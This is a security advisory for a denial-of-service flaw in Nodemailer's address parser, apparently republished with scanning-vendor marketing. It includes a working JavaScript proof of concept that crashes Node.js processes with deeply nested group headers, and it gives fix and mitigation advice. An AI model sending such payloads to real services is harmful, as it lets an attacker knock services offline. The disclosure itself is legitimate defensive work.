GHSA-rcmh-qjqh-p98v
HIGHNodemailer’s addressparser is vulnerable to DoS caused by recursive calls
EPSS Exploitation Probability
EPSS (Exploit Prediction Scoring System) is a daily probability model maintained by FIRST.org. It estimates the likelihood a CVE will be exploited in production environments within the next 30 days, derived from real-world threat intelligence signals.
Blast Radius
nodemailerReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects npm packages — download data is not available via public APIs for these ecosystems.
Description
Summary
A DoS can occur that immediately halts the system due to the use of an unsafe function.
Details
According to RFC 5322, nested group structures (a group inside another group) are not allowed. Therefore, in lib/addressparser/index.js, the email address parser performs flattening when nested groups appear, since such input is likely to be abnormal. (If the address is valid, it is added as-is.) In other words, the parser flattens all nested groups and inserts them into the final group list. However, the code implemented for this flattening process can be exploited by malicious input and triggers DoS
RFC 5322 uses a colon (:) to define a group, and commas (,) are used to separate members within a group. At the following location in lib/addressparser/index.js:
https://github.com/nodemailer/nodemailer/blob/master/lib/addressparser/index.js#L90
there is code that performs this flattening. The issue occurs when the email address parser attempts to process the following kind of malicious address header:
g0: g1: g2: g3: ... gN: [email protected];
Because no recursion depth limit is enforced, the parser repeatedly invokes itself in the pattern
addressparser → _handleAddress → addressparser → ...
for each nested group. As a result, when an attacker sends a header containing many colons, Nodemailer enters infinite recursion, eventually throwing Maximum call stack size exceeded and causing the process to terminate immediately. Due to the structure of this behavior, no authentication is required, and a single request is enough to shut down the service.
The problematic code section is as follows:
if (isGroup) {
...
if (data.group.length) {
let parsedGroup = addressparser(data.group.join(',')); // <- boom!
parsedGroup.forEach(member => {
if (member.group) {
groupMembers = groupMembers.concat(member.group);
} else {
groupMembers.push(member);
}
});
}
}
data.group is expected to contain members separated by commas, but in the attacker’s payload the group contains colon (:) tokens. Because of this, the parser repeatedly triggers recursive calls for each colon, proportional to their number.
PoC
const nodemailer = require('nodemailer');
function buildDeepGroup(depth) {
let parts = [];
for (let i = 0; i < depth; i++) {
parts.push(`g${i}:`);
}
return parts.join(' ') + ' [email protected];';
}
const DEPTH = 3000; // <- control depth
const toHeader = buildDeepGroup(DEPTH);
console.log('to header length:', toHeader.length);
const transporter = nodemailer.createTransport({
streamTransport: true,
buffer: true,
newline: 'unix'
});
console.log('parsing start');
transporter.sendMail(
{
from: '[email protected]',
to: toHeader,
subject: 'test',
text: 'test'
},
(err, info) => {
if (err) {
console.error('error:', err);
} else {
console.log('finished :', info && info.envelope);
}
}
);
As a result, when the colon is repeated beyond a certain threshold, the Node.js process terminates immediately.
Impact
The attacker can achieve the following:
- Force an immediate crash of any server/service that uses Nodemailer
- Kill the backend process with a single web request
- In environments using PM2/Forever, trigger a continuous restart loop, causing severe resource exhaustion”
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 📦npm | nodemailer | all versions | 7.0.11 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for nodemailer. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update nodemailer to 7.0.11 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-rcmh-qjqh-p98v is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-rcmh-qjqh-p98v is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-rcmh-qjqh-p98v. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-rcmh-qjqh-p98v in your dependencies?
O3 detects GHSA-rcmh-qjqh-p98v across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.